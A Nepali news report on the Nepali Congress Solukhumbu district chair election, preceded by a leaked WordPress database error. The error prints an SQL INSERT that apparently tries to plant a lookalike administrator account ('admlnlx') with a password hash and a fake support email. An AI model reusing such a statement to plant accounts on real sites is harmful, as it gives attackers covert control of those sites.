WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByhX7u4NBvkwpwP6z6yXJajJxnbkpp/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:45:26', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । नेपाली कांग्रेस सोलुखुम्बुको सभापतिमा नाम्गे लजाङ्बु शेर्पाले बाजि मारे।
हिजो (मंगलबार) भएको दोस्रो चरणको निर्वाचनमा ८९७ मत खसेकोमा शेर्पाले १४२ मतान्तरले जीत हासिल गरेको हो ।
शेर्पाले कुल खसेको मतमा ५१३ मत प्राप्त गरे भने अर्का सभापतिका उम्मेदवार विनोद कुमार बस्नेतले ३७१ मत प्राप्त गरेका थिए ।
मंगलबार दिउँसो देखि शुरु भएको मतदान साँझ ६ बजेको पेरिफेरीमा सकिएको थियो । ९२३ क्षेत्रिय प्रतिनिधि रहेको सोलुखुम्बुमा पहिलो चरणको निर्वाचनमा ८८२ मत खसेको थियो । सभापति मात्र चयनका लागि भएको दोस्रो चरणको निर्वाचनमा १५ मत बढि खसेको थियो ।
पहिलो चरणमा पूर्व महाधिवेशन प्रतिनिधि राम बहादुर बस्नेतको सहित तीनजनाको उम्मेदवारी परेपछि नेपाली काङ्ग्रेसको विधान अनुसार ५० प्रतिशत मत कसैको नआएपछि पहिलो र दोस्रो मत ल्याउने बिचमा दोस्रो चरणको निर्वाचन भएको हो।